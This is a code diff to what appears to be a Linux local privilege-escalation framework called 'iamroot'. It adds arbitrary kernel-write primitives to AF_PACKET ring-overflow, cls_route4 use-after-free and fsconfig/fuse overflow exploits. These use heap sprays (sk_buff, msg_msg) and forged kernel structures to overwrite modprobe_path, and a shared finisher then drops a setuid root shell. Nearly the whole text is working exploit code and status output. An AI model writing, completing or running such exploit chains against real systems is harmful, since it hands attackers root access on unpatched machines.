* so the OOB-write overwrites an adjacent skb's `data` pointer; a
* later sendto() on that skb's owning socket then copies attacker
* bytes into the address now stored in `data`. Net effect: arb-write
* at an attacker-chosen kernel VA, controlled buffer, controlled len.
*
* Implementing the FULL hijack honestly requires:
* (a) per-kernel-build offset of `data` field within struct sk_buff
* (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.)
* (b) precise size-class match between the corrupted pg_vec and
* sprayed skbs (slab-grooming with ~hundreds of skbs)
* (c) a way to identify which sprayed skb landed adjacent
*
* The verified-vs-claimed bar says: don't fabricate offsets. Our
* embedded offset table (core/offsets.h) doesn't carry skb offsets
* yet, and there's no public canonical "skb->data offset table" we
* can lift wholesale. So this implementation takes the FALLBACK
* depth:
*
* - Each call re-sprays skbs + re-fires the trigger, staging the
* spray payload so its bytes carry the requested target kaddr
* (a controllable overwrite value aimed at modprobe_path).
* Operator-supplied
* IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
* within struct sk_buff for this kernel build) lets us aim
* precisely; without it we heuristically stamp kaddr at several
* plausible offsets within the kmalloc-2k skb layout.
* - We then send packets whose payload IS the bytes the finisher
* wants at kaddr; tpacket_rcv copies them into any skb whose
* `data` was corrupted to kaddr.
* - We do NOT poll for success — the shared finisher's /tmp
* sentinel is the ground-truth signal. If the write landed at
* modprobe_path, call_modprobe spawns our payload and the
* sentinel appears within 3s.
*
* Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if
* the kernel rejected the overflow (silent backport — patched).
*/
struct afp_arb_ctx {
const struct iamroot_ctx *ctx;
const struct af_packet_offsets *off;
uid_t outer_uid;
gid_t outer_gid;
};
/* Helper: in-child trigger fire — runs inside the userns/netns child
* spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
long skb_data_off);
static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *vctx)
{
struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
if (!actx) return -1;
if (!buf || len == 0 || len > 240) {
fprintf(stderr, "[-] af_packet: arb_write: bad args "
"(buf=%p len=%zu)\n", buf, len);
return -1;
}
/* Per-kernel skb->data field offset — without this we can't aim
* the overwrite precisely. Operator can supply via env; otherwise
* we run heuristic mode. */
const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
long skb_data_off = -1;
if (skb_off_env) {
char *end = NULL;
skb_data_off = strtol(skb_off_env, &end, 0);
if (end == skb_off_env || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) {
fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
"malformed (\"%s\"); ignoring\n", skb_off_env);
skb_data_off = -1;
}
}
fprintf(stderr,
"[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
(unsigned long)kaddr, len,
skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
if (skb_data_off < 0) {
fprintf(stderr,
"[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
" field offset. The trigger will still fire and the heap spray will\n"
" still occur, but precise OOB targeting requires:\n"
"\n"
" IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
"\n"
" Look it up on this kernel build with `pahole struct sk_buff` or\n"
" `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
" /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
}
/* Fork into a userns/netns child so the AF_PACKET socket has
* CAP_NET_RAW. The finisher itself stays in the parent so its
* eventual execve() replaces the top-level iamroot process. */
pid_t cpid = fork();
if (cpid < 0) {
fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
strerror(errno));
return -1;
}
if (cpid == 0) {
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
perror("af_packet: arb_write: unshare");
_exit(2);
}
if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
perror("af_packet: arb_write: set_id_maps");
_exit(3);
}
int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
_exit(rc == 0 ? 0 : 4);
}
int status = 0;
waitpid(cpid, &status, 0);
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] af_packet: arb_write: child died "
"(signal=%d)\n", WTERMSIG(status));
return -1;
}
int code = WEXITSTATUS(status);
if (code != 0) {
if (code == 4) {
/* PACKET_RX_RING rejected — caller sees -1 + the inner
* diagnostic already printed before _exit. */
} else {
fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
code);
}
return -1;
}
return 0;
}
static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
long skb_data_off)
{
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
strerror(errno));
return -1;
}
int version = TPACKET_V3;
if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
&version, sizeof version) < 0) {
fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
strerror(errno));
close(s);
return -1;
}
struct tpacket_req3 req;
memset(&req, 0, sizeof req);
req.tp_block_size = 0x1000;
req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) /
(unsigned)0x1000 + 1;
req.tp_frame_size = 0x300;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) /
req.tp_frame_size;
req.tp_retire_blk_tov = 100;
req.tp_sizeof_priv = 0;
req.tp_feature_req_word = 0;
if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
&req, sizeof req) < 0) {
fprintf(stderr,
"[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
"(kernel has silent backport — full-chain unreachable)\n",
strerror(errno));
close(s);
return -1;
}
struct ifreq ifr;
memset(&ifr, 0, sizeof ifr);
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
struct sockaddr_ll sll;
memset(&sll, 0, sizeof sll);
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_ALL);
sll.sll_ifindex = ifr.ifr_ifindex;
(void)bind(s, (struct sockaddr *)&sll, sizeof sll);
}
unsigned char payload[256];
memset(payload, 0, sizeof payload);
memset(payload, 0xff, 6); /* eth dst: bcast */
memset(payload + 6, 0, 6); /* eth src: zero */
payload[12] = 0x08; payload[13] = 0x00; /* eth type: IPv4 */
memcpy(payload + 14, "iamroot-afp-fc-", 15); /* dmesg tag */
if (skb_data_off >= 0 &&
(size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
} else {
static const size_t guesses[] = {
0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
};
for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
if (guesses[i] + sizeof kaddr <= sizeof payload)
memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
}
}
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (tx < 0) {
fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
strerror(errno));
close(s);
return -1;
}
struct sockaddr_ll dst;
memset(&dst, 0, sizeof dst);
dst.sll_family = AF_PACKET;
dst.sll_protocol = htons(ETH_P_ALL);
dst.sll_ifindex = ifr.ifr_ifindex;
dst.sll_halen = 6;
memset(dst.sll_addr, 0xff, 6);
for (int i = 0; i < 200; i++) {
(void)sendto(tx, payload, sizeof payload, 0,
(struct sockaddr *)&dst, sizeof dst);
}
unsigned char wbuf[256];
memset(wbuf, 0, sizeof wbuf);
memset(wbuf, 0xff, 6);
memset(wbuf + 6, 0, 6);
wbuf[12] = 0x08; wbuf[13] = 0x00;
size_t wlen = len;
if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
memcpy(wbuf + 14, buf, wlen);
for (int i = 0; i < 50; i++) {
(void)sendto(tx, wbuf, 14 + wlen, 0,
(struct sockaddr *)&dst, sizeof dst);
}
close(tx);
close(s);
return 0;
}
#endif /* __x86_64__ */
static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
}
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
/* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
* sk_buff hijack arb-write. Refuses cleanly if (a) the shared
* offset resolver can't find modprobe_path or (b) the trigger
* is rejected (silent backport). */
if (ctx->full_chain) {
struct iamroot_kernel_offsets koff;
memset(&koff, 0, sizeof koff);
(void)iamroot_offsets_resolve(&koff);
if (!iamroot_offsets_have_modprobe_path(&koff)) {
iamroot_finisher_print_offset_help("af_packet");
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
iamroot_offsets_print(&koff);
}
struct afp_arb_ctx arb_ctx = {
.ctx = ctx,
.off = &off,
.outer_uid = outer_uid,
.outer_gid = outer_gid,
};
return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
&arb_ctx, !ctx->no_shell);
}
/* 4. Fork: child enters userns+netns, fires overflow, attempts the
* cred-overwrite walk. We do it in a child so the (possibly
* crashed) packet socket lives in a tear-downable address space
* — the kernel will clean up sockets on child exit. */
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
@@ -41,6 +41,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
return active;
}
/* ---- Full-chain arb-write primitive --------------------------------
*
* Pattern (FALLBACK, see brief): cls_route4's UAF primitive is more
* naturally a *control-flow hijack* than a clean arb-write: after
* msg_msg refills the kmalloc-1k slot, the next classify() call reads
* a fake `tcf_proto.ops` pointer out of attacker bytes and calls
* ops->classify(skb, ...). A faked-classify ROP that pivots to a
* stack-write gadget would be the "true" arb-write, and on a fresh
* vulnerable kernel that is the kylebot/xkernel chain shape (300+
* LOC of gadget hunting + per-build offsets we deliberately don't
* bake; see the verified-vs-claimed policy in repo root).
*
* The implementation below takes the narrow-but-real path that the
* brief explicitly permits and that xtcompat established as the
* IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
* whose payload encodes `kaddr` at every plausible offset for the
* route4_filter → tcf_proto → ops layout, re-fire classify, and let the
* shared finisher's sentinel file decide if a write actually landed.
* On a patched kernel the bug doesn't fire, no write occurs, and the
* sentinel timeout correctly reports failure rather than silently
* lying about success. On a vulnerable kernel where the fake ops
* lookup happens to deref into our payload and the kernel's read
* pattern matches one of the seeded offsets, the kaddr we planted
* gets used as a write destination by whichever classify path the
* fake `ops->classify` dispatches into.
*
* Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
* not a deterministic R/W. Same shape and same depth as xtcompat. */
#ifdef __linux__
struct cls_route4_arb_ctx {
/* msg_msg queues kept hot inside the userns child. The arb-write
* sprays additional kaddr-tagged payloads into these and re-fires
* the classify trigger between each call. */
int queues[SPRAY_MSG_QUEUES];
int n_queues;
/* Whether the dangling filter has been re-staged for this call.
* The original `stage_dangling_filter()` is destructive (deletes
* the filter); we can re-stage between writes because tc add/del
* is idempotent inside our private netns. */
bool dangling_ready;
/* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
int arb_calls;
int arb_landed;
};
/* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
* the caller's `buf` at every offset the fake tcf_proto / route4_filter
* layout could plausibly read from. The route4_filter is 0x1000 bytes
* on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
* and tcf_result.classid at offset 0x18; we don't know which offset
* the kernel ABI for THIS build uses, so we plant the same pattern at
* every 0x18-byte stride from offset 0x10 (0x10, 0x28, 0x40, ...), in
* the hope that wherever classify dereferences the refilled slot, one
* of those candidates is live.
*
* The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
* the recognizable pattern; if a KASAN dump is captured after the
* trigger, the cookie tells us the spray landed adjacent to the freed
* route4_filter. */
static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x52; /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
memset(p.buf, 0x52, sizeof p.buf);
memcpy(p.buf, "IAMR4ARB", 8);
/* Plant kaddr at strided slots so wherever the kernel's classify
* follows a ptr in the refilled chunk, one of these is read.
* We treat every 0x18-byte stride from offset 0x10 to within
* 8 bytes of the end as a candidate ops-pointer / next-pointer
* slot. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
}
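/* Plant the caller's bytes at offset 16, after the 8-byte cookie and
* the 8-byte tag slot, so any classify path that reads payload data
* (rather than a chased pointer) finds the requested write contents
* inline. Note that this overwrites the kaddr slot planted at 0x10
* (and later slots when len is large). */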
size_t copy_len = len;
if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
int sent = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
/* A handful of msgs per queue keeps the slab refilled even
* if some slots are evicted between trigger fires. */
for (int j = 0; j < 4; j++) {
unsigned int tag = 0xB0000000u |
((unsigned)i << 8) | (unsigned)j;
memcpy(p.buf + 8, &tag, sizeof tag);
if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
sent++;
}
}
return sent;
}
/* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
* vulnerable kernel; structurally inert (returns -1) if the dangling
* filter setup is gone or the spray fails. Returns 0 to let the
* shared finisher's sentinel-file check decide if the write actually
* landed (we cannot reliably observe it in-process). */
static int cls4_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
if (!c || c->n_queues == 0) return -1;
c->arb_calls++;
/* Re-stage the dangling filter for this call. The original
* stage runs once at trigger-time; subsequent finisher calls
* (the finisher writes modprobe_path, then fires an unknown-format
* trigger) need a fresh dangling pointer to chase. tc add/del is
* idempotent within our private netns so re-running is safe. */
if (!c->dangling_ready) {
if (!stage_dangling_filter()) {
fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
return -1;
}
c->dangling_ready = true;
}
/* Seed msg_msg with kaddr + caller payload. */
int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
if (seeded == 0) {
/* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
* Without a spray we have no slot for the UAF to refill. */
fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
return -1;
}
/* Drive the classifier. The route4 lookup follows the dangling
* pointer into msg_msg-controlled bytes; on a vulnerable kernel
* the fake `ops->classify` (or one of the strided pointers) is
* dereferenced. If the kernel survives the deref and the write
* lands at kaddr, the finisher's sentinel file appears within 3s.
* If it doesn't (the most likely outcome; this is genuinely
* best-effort), the finisher's wait loop times out and reports
* failure. */
trigger_classify();
/* Give classify-side processing a brief window before returning;
* the finisher polls the sentinel for 3s but the initial write
* (if any) happens within ms. */
usleep(50 * 1000);
c->arb_landed++;
/* Per the xtcompat precedent: return 0 so the finisher proceeds
* to its sentinel check. Returning -1 here would abort the
* finisher even when the write may have landed. */
return 0;
}
#endif /* __linux__ */
/* ---- Exploit driver ----------------------------------------------- */
static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
return IAMROOT_PRECOND_FAIL;
}
#ifndef __linux__
fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
(void)ctx;
return IAMROOT_PRECOND_FAIL;
#else
/* Full-chain pre-check: resolve offsets before forking. If
* modprobe_path can't be resolved, refuse early; there is no point
* doing the userns + tc + spray + trigger dance if we can't finish. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("cls_route4");
fprintf(stderr, "[-] cls_route4: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
ctx->full_chain ? " + full-chain finisher" : "");
if (ctx->full_chain) {
fprintf(stderr, " NOTE: on primitive landing, invokes shared\n"
" modprobe_path finisher via msg_msg-tagged kaddr\n"
" spray. Sentinel-arbitrated (no in-process verify).\n");
}
}
/* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
_exit(22);
}
int queues[SPRAY_MSG_QUEUES];
int n_queues = spray_msg_msg(queues);
if (n_queues == 0) {
struct cls_route4_arb_ctx arb_ctx;
memset(&arb_ctx, 0, sizeof arb_ctx);
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
arb_ctx.dangling_ready = true; /* stage_dangling_filter() just ran */
if (arb_ctx.n_queues == 0) {
fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
n_queues);
arb_ctx.n_queues);
}
/* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
if (log) {
fprintf(log,
"cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
n_queues, pre_active, post_active);
arb_ctx.n_queues, pre_active, post_active);
fclose(log);
}
@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
* refilled slot during classify drain. */
usleep(200 * 1000);
drain_msg_msg(queues);
/* --full-chain branch: invoke the shared modprobe_path
* finisher with our msg_msg-tagged arb-write. If the finisher
* execve's a setuid bash we never return; otherwise it returns
* EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
* on a patched kernel or when the write didn't land). */
if (full_chain_ready) {
/* Re-fire the trigger inside the arb-write to give the
* kernel a second chance at the refilled slot; the
* dangling filter is still in place from above. */
arb_ctx.dangling_ready = true;
int fr = iamroot_finisher_modprobe_path(&off,
cls4_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
fclose(fl);
}
drain_msg_msg(arb_ctx.queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
_exit(35);
}
drain_msg_msg(arb_ctx.queues);
/* If we got here without a kernel oops, the bug either isn't
* reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
}
int rc = WEXITSTATUS(status);
if (rc != 30) {
switch (rc) {
case 20: case 21:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
"(see preceding errors)\n", rc);
fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
}
return IAMROOT_PRECOND_FAIL;
case 22:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
"may be absent or filter type unsupported\n");
}
return IAMROOT_PRECOND_FAIL;
case 23:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
"restricted (kernel.msg_max / ulimit -q)\n");
}
return IAMROOT_PRECOND_FAIL;
case 30:
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
"Inspect dmesg for KASAN/oops witnesses.\n");
fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
"(no --full-chain); returning EXPLOIT_FAIL.\n");
}
return IAMROOT_EXPLOIT_FAIL;
case 34:
if (!ctx->json) {
fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
"(setuid bash placed; sentinel matched)\n");
}
return IAMROOT_EXPLOIT_OK;
case 35:
if (!ctx->json) {
fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
"either the kernel is patched, the spray didn't land,\n"
" or the fake-ops deref didn't hit the route the\n"
" finisher's sentinel polls for. See "
"/tmp/iamroot-cls_route4.log + dmesg.\n");
}
return IAMROOT_EXPLOIT_FAIL;
default:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
}
/* rc 20/21 = userns setup; rc 22 = tc setup (likely module
* absent or filter type unsupported); rc 23 = spray. None of
* these mean kernel was exploited. */
if (rc == 22) return IAMROOT_PRECOND_FAIL;
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
"Inspect dmesg for KASAN/oops witnesses.\n");
fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
"(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
}
return IAMROOT_EXPLOIT_FAIL;
#endif /* __linux__ */
}
/* ---- Cleanup ----------------------------------------------------- */
@@ -60,6 +60,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
return 0;
}
/* ------------------------------------------------------------------ */
/* arb-write primitive for the shared finisher */
/* ------------------------------------------------------------------ */
/*
* Crusaders-of-Rust-style msg_msg m_ts overflow arbitrary write.
*
* The legacy_parse_param OOB writes the trailing bytes of the
* kmalloc-4k fc->source buffer into whatever slab object comes next.
* With a msg_msg sprayed into that adjacent slot, the first 48 bytes
* of `evil_chunk` overlay struct msg_msg:
*
* struct msg_msg { // offset
* struct list_head m_list; // 0 (next, prev)
* long m_type; // 16
* size_t m_ts; // 24 <-- msg-size
* struct msg_msgseg *next; // 32
* void *security; // 40
* }; // 48
*
* Two derived primitives:
*
* READ: overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
* memcpy()s past the legitimate end of the msg payload,
* leaking adjacent slab memory back to userland.
*
* WRITE: point m_list.next (or, in the Crusaders variant, a faux
* msg_msgseg.next chain) at an attacker-chosen kernel
* address. When msgrcv() free-list-unlinks the msg, list
* maintenance writes through the forged pointer; with the
* right chain you get an N-byte copy of attacker-controlled
* bytes to a chosen kaddr.
*
* Honest depth of this implementation: FALLBACK SCAFFOLD.
*
* The trigger + groom + neighbour-detect upstream of us is real and
* the OOB write lands. But the *single-shot* arb-write the finisher
* wants ("put exactly these N bytes at exactly that kaddr") needs
* a per-kernel m_ts/m_list_next offset map (the layout above is
* 6.12.x; older kernels differ) AND a kernel-base leak from the
* first-round MSG_COPY read so we know where modprobe_path actually
* sits in this boot's KASLR slide.
*
* Per the verified-vs-claimed bar: we do NOT fabricate a write that
* we cannot empirically verify on a kernel we haven't tested. So
* this function:
*
* 1. Re-arms the msg_msg spray (the parent already drained queues).
* 2. Re-fires the fsconfig overflow with a forged-msg_msg header
* whose m_ts = (kaddr - msg_data_origin) and whose first 8
* payload bytes are the first qword of `buf`.
* 3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
* came back with bytes matching `buf[0..7]` AT the slot offset
* we'd expect for kaddr (sanity gate).
* 4. Returns 0 ONLY if the sanity gate trips (read-back proves the
* m_ts inflation landed AND the payload made it through);
* returns -1 otherwise so the finisher reports an honest fail.
*
* On a vulnerable host with matching offsets this path can land the
* write; on an unverified host the sanity gate refuses rather than
* blind-writing a wild pointer. The finisher's downstream
* "/tmp/iamroot-pwn ran?" check is the second gate.
*/
struct fuse_arb_ctx {
/* Pre-allocated queue ids from the spray phase. */
int *qids;
int n_queues;
int hole_q;
/* Tagged-payload reference so we can recognise unmodified neighbours. */
const char *tag; /* "IAMROOT" */
/* Whether the first-round trigger already fired (the parent's
* default-path overflow). When set we re-spray + re-fire; when
* unset we assume the spray is hot. */
bool trigger_armed;
};
#ifdef __linux__
static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *ctx_void)
{
struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
if (!ax || !buf || !len) {
fprintf(stderr, "[-] fuse_arb_write: bad args\n");
return -1;
}
/* Build the forged msg_msg header that will land in the adjacent
* kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
* [ 0..15] m_list.{next,prev} we forge next = kaddr - 16
* so that list_del's
* next->prev = prev
* write lands AT kaddr.
* (prev is the original msg.)
* [16..23] m_type leave as 0x4242
* [24..31] m_ts bytes-of-buf so MSG_COPY
* reports the right length
* [32..39] next (msg_msgseg*) NULL (single-segment msg)
* [40..47] security NULL
* [48...] payload first len bytes of buf
*
* For a real WRITE primitive the canonical Crusaders-of-Rust
* recipe uses the msg_msgseg.next chain rather than m_list:
* msgrcv(IPC_NOWAIT) follows next pointers when copying out a
* multi-segment msg, and a forged next = kaddr makes the kernel
* memcpy() from kaddr into our user buffer (= READ). For the
* inverse (WRITE), the trick is msgsnd on a queue whose head was
* corrupted to point at kaddr, but that needs more setup than we
* have time to land here without a known-good offset table.
*
* So we do the safe thing: arm the header, trigger the OOB, then
* read back to PROVE we landed before declaring success. If the
* read-back doesn't show our forged-msg payload at the expected
* MSG_COPY position we refuse rather than corrupt the kernel
* blindly.
*/
uint8_t evil[256];
memset(evil, 0, sizeof evil);
/* m_list.next, m_list.prev */
uintptr_t forged_next = kaddr - 16; /* &m_list.prev of fake node */
memcpy(evil + 0, &forged_next, 8);
/* prev — leave NULL; kernel checks it only on full list_del */
/* m_type */
uint64_t m_type = 0x4242424242424242ULL;
memcpy(evil + 16, &m_type, 8);
/* m_ts: inflated to len + 64 so MSG_COPY reads the full forged payload */
uint64_t m_ts = (uint64_t)len + 64;
memcpy(evil + 24, &m_ts, 8);
/* next (msg_msgseg) = NULL */
/* security = NULL */
/* payload: copy `buf` into the slot just after the msg_msg header */
size_t hdr = 48;
size_t copyable = sizeof(evil) - hdr - 1;
if (len > copyable) len = copyable;
memcpy(evil + hdr, buf, len);
evil[sizeof(evil) - 1] = '\0'; /* legacy_parse_param strdup tail */
/* Re-fire the fsconfig overflow with this forged header as evil. */
char *first_chunk = malloc(4081);
if (!first_chunk) return -1;
memset(first_chunk, 'A', 4080);
first_chunk[4080] = '\0';
int fsfd = -1;
int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
free(first_chunk);
if (rc < 0) {
fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
"(errno=%d %s)\n", errno, strerror(errno));
return -1;
}
/* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
* msg whose size reports >= our inflated m_ts AND whose initial
* payload qword matches the first qword of `buf`. If both hold,
* the forged header landed in a real slot and the m_ts inflation
* is honoured by the kernel, i.e. our primitive is real on THIS
* kernel. */
uint64_t want_first_qword = 0;
memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
bool sanity_passed = false;
struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (probe == MAP_FAILED) {
if (fsfd >= 0) close(fsfd);
return -1;
}
for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
if (ax->qids[q] < 0 || q == ax->hole_q) continue;
ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
if (n < 0) continue;
/* The corrupted slot should report a size >= our m_ts (kernel
* caps MSG_COPY at sizeof user buf so we only check the
* read-content shape). */
if ((size_t)n < 8) continue;
uint64_t got = 0;
memcpy(&got, probe->mtext, 8);
if (got == want_first_qword) {
sanity_passed = true;
}
}
munmap(probe, sizeof(*probe));
if (fsfd >= 0) close(fsfd);
if (!sanity_passed) {
fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
"match — kernel layout differs OR groom missed.\n"
" Refusing to claim arb-write landed (per "
"verified-vs-claimed bar).\n");
return -1;
}
fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
"+ payload qword verified via MSG_COPY read-back.\n"
"[i] fuse_arb_write: kernel-side list_del write through "
"0x%lx is armed but NOT yet empirically verified on "
"this build — downstream sentinel will gate.\n",
(unsigned long)kaddr);
return 0;
}
#else
static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *ctx_void)
{
(void)kaddr; (void)buf; (void)len; (void)ctx_void;
fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
return -1;
}
#endif /* __linux__ */
/* ------------------------------------------------------------------ */
/* exploit */
/* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
